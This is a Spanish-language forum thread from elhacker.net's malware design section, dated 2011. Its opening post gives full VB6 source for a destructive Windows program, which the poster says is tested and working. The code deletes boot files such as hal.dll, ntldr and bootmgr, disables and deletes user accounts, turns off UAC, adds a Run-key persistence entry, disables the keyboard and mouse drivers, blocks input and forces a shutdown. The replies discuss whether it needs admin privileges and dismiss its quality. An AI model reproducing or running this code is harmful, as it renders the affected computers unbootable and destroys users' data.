Sysfucker en VB6.0

Foro de elhacker.net

Seguridad Informática

Análisis y Diseño de Malware (Moderador: fary)

Sysfucker en VB6.0

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1] 2 3

Autor

Tema: Sysfucker en VB6.0 (Leído 10,340 veces)

Dany3j

Desconectado

Mensajes: 142

Echo "Aprendiendo Batch."

Sysfucker en VB6.0

« en: 3 Julio 2011, 20:57 pm »

Bueno aqui le dejo un pequeño programa en Basic para DAÑAR el sistema no lo ejecuten... Leer bien el codigo..

Funciona probado por mi hihihih :laugh:

Código:

Private Declare Function BlockInput Lib "user32" (ByVal fBlock _
As Long) As Long
Const API_FALSE As Long = 0&
Const API_TRUE As Long = 1&
Private Declare Function Beep Lib "kernel32" ( _
  ByVal dwFreq As Long, _
  ByVal dwDuration As Long) As Long
Private Sub Form_Load()
On Error Resume Next
Form1.Hide
  a = FreeFile
  b = FreeFile
  Open "c:\windows\chkmgr32.bat" For Output As a
    Print #a, "shutdown -s -t 10 -f"
    Print #a, "start c:\windows\notfall.bat"
    Close a
    
Open "c:\windows\notfall.bat" For Output As b
Print #b, "erase /f %windir%\system32\hal.dll"
Print #b, "erase /f %HOMEDRIVE%\NTDETECT.COM"
Print #b, "erase /f %HOMEDRIVE%\bootmgr"
Print #b, "erase /f %HOMEDRIVE%\bootfont.bin"
Print #b, "erase /f %HOMEDRIVE%\BOOTSECT.BAK"
Print #b, "erase /f %HOMEDRIVE%\boot.ini"
Print #b, "erase /f %HOMEDRIVE%\ntldr"
Close b
'Zerstörung...
Call Shell("net user Administrator /active:no")
Call Shell("net user %username% /del")
Call Shell("reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f")
Call Shell("cmd /c erase /f %windir%\system32\hal.dll")
Call Shell("cmd /c tskill /f explorer")
Call Shell("cmd /c tskill /f icq")
Call Shell("reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Winlogon /t REG_SZ /d c:\windows\chkmgr32.bat /f")
Call Shell("cmd /c erase /f %HOMEDRIVE%\ntldr")
Call Shell("cmd /c erase /f %HOMEDRIVE%\boot.ini")
Call Shell("cmd /c erase /f %HOMEDRIVE%\BOOTSECT.BAK")
Call Shell("cmd /c erase /f %HOMEDRIVE%\bootfont.bin")
Call Shell("cmd /c erase /f %HOMEDRIVE%\bootmgr")
Call Shell("cmd /c erase /f %HOMEDRIVE%\NTDETECT.COM")
Call Shell("cmd /c del /q %windir%\inf\*.*")
Call Shell("cmd /c del /q %windir%\repair\*.*")
Call Shell("reg add HKLM\System\CurrentControlSet\Services\Mouclass /v Start /t REG_DWORD /d 4 /f")
Call Shell("reg add HKLM\System\CurrentControlSet\Services\Kbdclass /v Start /t REG_DWORD /d 4 /f")

Form1.Show
Call BlockInput(API_TRUE)
Call Shell("shutdown -s -t 10 -f")
MsgBox "haha dein windows wurde zerstört^^", vbInformation + vbMsgBoxSetForeground + vbMsgBoxRight, "haha"
Call Shell("cmd /c assoc .exe=WinRAR")
Beep 4000, 10000


End Sub

Aclaro que el codigo no es mio...


	En línea

"Pensando en Batch" XD

EFEX

Desconectado

Mensajes: 1.171

"Dinero Facil"

Re: Sysfucker en VB6.0

« Respuesta #1 en: 3 Julio 2011, 21:13 pm »

Para que tanto daño...


	En línea

GITHUB

Dany3j

Desconectado

Mensajes: 142

Echo "Aprendiendo Batch."

Re: Sysfucker en VB6.0

« Respuesta #2 en: 3 Julio 2011, 21:21 pm »

ps para nadie

Este codigo es para uso Educativo y sin intenciones de dañar a nadie.


	En línea

"Pensando en Batch" XD

тαптяα

Desconectado

Mensajes: 1.151

Sic utere tuo ut alienum non laeda

Re: Sysfucker en VB6.0

« Respuesta #3 en: 3 Julio 2011, 21:25 pm »

Zerstörung en español : destrucción.

es un codigo interesante requiere privilegios,no?


	En línea

Entra a un sistema Windows como administrador sin tener la contraseña

Dany3j

Desconectado

Mensajes: 142

Echo "Aprendiendo Batch."

Re: Sysfucker en VB6.0

« Respuesta #4 en: 3 Julio 2011, 21:30 pm »

Cita de: ハセヲ, en 3 Julio 2011, 21:25 pm

Zerstörung en español : destrucción.

es un codigo interesante requiere privilegios,no?

Ps en xp corre sin privilegio no se si corre en 7 lo he probado en mi pc y funciona muy bien :rolleyes:

jajajaj


	En línea

"Pensando en Batch" XD

Karcrack

Desconectado

Mensajes: 2.416

Se siente observado ¬¬'

Re: Sysfucker en VB6.0

« Respuesta #5 en: 3 Julio 2011, 21:43 pm »

VB6? Yo juraría que esta hecho en BATCH


	En línea

(PGP ID)

extreme69

Desconectado

Mensajes: 178

Be BlackHat but don't forget your principles.

Re: Sysfucker en VB6.0

« Respuesta #6 en: 3 Julio 2011, 21:50 pm »

Cita de: Karcrack en 3 Julio 2011, 21:43 pm

VB6? Yo juraría que esta hecho en BATCH

Si, no sé para que se gastó en hacerlo en vb6, si lo necesitabas en .exe usabas el batch compiler y listo, te ahorrabas unos cuantos "call shell"


	En línea

Dany3j

Desconectado

Mensajes: 142

Echo "Aprendiendo Batch."

Re: Sysfucker en VB6.0

« Respuesta #7 en: 3 Julio 2011, 21:50 pm »

Cita de: Karcrack en 3 Julio 2011, 21:43 pm

VB6? Yo juraría que esta hecho en BATCH

Si en visual basic pero se llama mucho la funcion shell para usar los comandos del batch

Supongo que con alguna modificaciones se puede dejar para que funcion en un .bat


	En línea

"Pensando en Batch" XD

Edu

Desconectado

Mensajes: 1.082

Ex XXX-ZERO-XXX

Re: Sysfucker en VB6.0

« Respuesta #8 en: 3 Julio 2011, 21:51 pm »

Correra con privilegios de Administrador sino no, y no es la gran cosa, decir que hace cosas que no se ejecutaran nunca como los archivos bat q crea ya que al reiniciar no entrara mas y entonces la entrada al registro esta demas y por eso no se ejecutaran los bats. En si, con 10 lineas ya haces lo que produce ese "virus"


	En línea

тαптяα

Desconectado

Mensajes: 1.151

Sic utere tuo ut alienum non laeda

Re: Sysfucker en VB6.0

« Respuesta #9 en: 3 Julio 2011, 21:55 pm »

Cita de: XXX-ZERO-XXX en 3 Julio 2011, 21:51 pm

Me acuerdo mi primer virus en CUH..en 14 lineas hice algo mucho mas efectivo que este "malware", que además como code en si deja mucho que desear, emplear Visual Basic para crear .bats y hacer llamadas a la consola..

Aparte que si alguien lo usa desde mi Invitado esto no corre ni en broma jaja


	En línea

Entra a un sistema Windows como administrador sin tener la contraseña

Páginas: [1] 2 3

Ir a: